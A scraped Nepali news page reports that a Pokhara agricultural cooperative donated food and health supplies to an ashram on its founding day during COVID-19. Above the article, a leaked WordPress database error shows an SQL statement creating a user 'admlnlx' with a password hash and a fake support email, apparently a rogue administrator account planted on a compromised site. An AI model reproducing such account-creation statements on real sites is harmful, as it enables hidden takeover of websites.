WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVYvHwIrkYggXKp9ktRT4KwF3wnRs10', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 22:59:38', '', 'admlnlx', 'admlnlx')

स्थापना दिवसमा खाद्यान्न सहयोग – Gaule Khabar

स्थापना दिवसमा खाद्यान्न सहयोग

स्थापना दिवसमा खाद्यान्न सहयोग

पोखरा । पोखरा महानगरपालिका वडा नं २७ स्थित तालचोक कृषि सहकारी संस्थाले आफ्नो स्थापना दिवसमा श्रीकृष्ण प्रणामी वृन्दावन धाम डाँडाकोनाकलाई खाद्यान्न तथा स्वास्थ्य सुरक्षा सामग्री सहयोग गरेको छ ।
सहकारीले चामल दाल, तेल, आलु मसला, विस्कुट र चिउरा लगायतका सामग्री हस्तान्तरण गरेको हो । संस्थाका अध्यक्ष उत्तम भण्डारीले कोभिड – १९ को सङ्कटको समयमा आश्रममा सामाजिक उत्तरदायित्व अन्र्तगत सहयोग गरिएको बताए । उक्त अवसरमा मास्क, स्यानिटाइजर लगायतका सामग्री समेत हस्तान्तरण गरिएको थियो । कार्यक्रममा धामका गुरु स्वामी विष्णु वशिष्टले दाताहरूको सहयोगले आश्रमका रहेका ज्येष्ठ नागरिक र बालबालिकालाई दैनिक जीवनयापनमा सहज हुँदै आएको बताए । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका